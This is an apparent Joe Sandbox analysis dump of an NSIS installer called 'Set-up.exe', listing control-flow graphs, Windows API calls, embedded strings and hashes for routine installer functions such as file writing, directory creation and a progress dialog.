292->291 298->288
                                                                APIs
                                                                • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                • ShowWindow.USER32(?), ref: 00401753
                                                                • ShowWindow.USER32(?), ref: 00401767
                                                                • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                Strings
                                                                • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                • BringToFront, xrefs: 004016BD
                                                                • Sleep(%d), xrefs: 0040169D
                                                                • Rename: %s, xrefs: 004018F8
                                                                • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                • SetFileAttributes failed., xrefs: 004017A1
                                                                • Rename on reboot: %s, xrefs: 00401943
                                                                • Call: %d, xrefs: 0040165A
                                                                • CreateDirectory: "%s" created, xrefs: 00401849
                                                                • detailprint: %s, xrefs: 00401679
                                                                • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                • Aborting: "%s", xrefs: 0040161D
                                                                • Jump: %d, xrefs: 00401602
                                                                • Rename failed: %s, xrefs: 0040194B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                • API String ID: 2872004960-3619442763
                                                                • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                                APIs
                                                                  • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                  • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                  • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                  • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                • API String ID: 608394941-1650083594
                                                                • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                • lstrcatW.KERNEL32(00000000,00000000,TeachesGoal,004CB0B0,00000000,00000000), ref: 00401A76
                                                                • CompareFileTime.KERNEL32(-00000014,?,TeachesGoal,TeachesGoal,00000000,00000000,TeachesGoal,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$TeachesGoal
                                                                • API String ID: 4286501637-1906683911
                                                                • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 637 403733-403739 609->637 610->607 635 40376b-40377c 610->635 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 619 4036c7-4036cb 613->619 620 40364d-403661 call 405e0c 613->620 614->607 623 4036d5-4036db 619->623 624 4036cd-4036d4 call 4032d2 619->624 620->623 634 403663-40366a 620->634 631 4036ea-4036f4 623->631 632 4036dd-4036e7 call 407281 623->632 624->623 631->602 636 4036fa 631->636 632->631 634->623 640 40366c-403673 634->640 641 403784-403787 635->641 642 40377e 635->642 636->600 637->607 637->610 640->623 643 403675-40367c 640->643 644 40378a-403792 641->644 642->641 643->623 645 40367e-403685 643->645 644->644 646 403794-4037af SetFilePointer call 405e0c 644->646 645->623 647 403687-4036a7 645->647 650 4037b4 646->650 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->636 651->652 652->623 653 4036c3-4036c5 652->653 653->623
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 00403598
                                                                • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                  • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                  • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                Strings
                                                                • Error launching installer, xrefs: 004035D7
                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                • Null, xrefs: 0040367E
                                                                • soft, xrefs: 00403675
                                                                • Inst, xrefs: 0040366C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                • API String ID: 4283519449-527102705
                                                                • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 004033E7
                                                                • GetTickCount.KERNEL32 ref: 00403464
                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                • wsprintfW.USER32 ref: 004034A4
                                                                • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: CountFileTickWrite$wsprintf
                                                                • String ID: ... %d%%$P1B$X1C$X1C
                                                                • API String ID: 651206458-1535804072
                                                                • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                                                APIs
                                                                • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                • String ID:
                                                                • API String ID: 2740478559-0
                                                                • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f69 GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 745 401f6e-401f7b 734->745 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 751 402387-40238d GlobalFree 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 750 4030e3-4030f2 745->750 745->751 747->750 763 402708-40270e 748->763 751->750 763->750
                                                                APIs
                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: FreeGloballstrcpyn
                                                                • String ID: Exch: stack < %d elements$Pop: stack empty$TeachesGoal
                                                                • API String ID: 1459762280-173623582
                                                                • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 766 402713-40273b call 406009 * 2 771 402746-402749 766->771 772 40273d-402743 call 40145c 766->772 774 402755-402758 771->774 775 40274b-402752 call 40145c 771->775 772->771 776 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 774->776 777 40275a-402761 call 40145c 774->777 775->774 777->776
                                                                APIs
                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: PrivateProfileStringWritelstrcpyn
                                                                • String ID: <RM>$TeachesGoal$WriteINIStr: wrote [%s] %s=%s in %s
                                                                • API String ID: 247603264-1906734859
                                                                • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 873 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 884 402223-4030f2 call 4062a3 873->884 885 40220d-40221b call 4062a3 873->885 885->884
                                                                APIs
